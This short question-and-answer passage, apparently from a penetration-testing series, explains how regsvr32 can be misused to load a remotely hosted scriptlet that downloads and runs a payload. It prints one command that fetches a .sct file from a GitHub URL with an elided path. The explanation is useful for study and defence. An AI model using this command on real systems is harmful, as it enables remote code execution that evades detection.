How can regsvr32 be abused to download and execute files from GitHub?

Regsvr32 can load a remotely hosted scriptlet (.sct) file that contains VBScript or JScript code. For example, using `regsvr32 /u /s /i:https://raw.githubusercontent.com/.../downloadexec.sct scrobj.dll` prompts regsvr32 to execute the script, which then calls PowerShell or VBScript to download and run the payload. This technique avoids touching disk with the initial payload and is part of the methods detailed in Penetration Techniques - Multiple Methods for Downloading Files from GitHub. Similar parameter-hiding approaches are explored in Penetration Techniques - Parameter Hiding Techniques in Shortcut Files.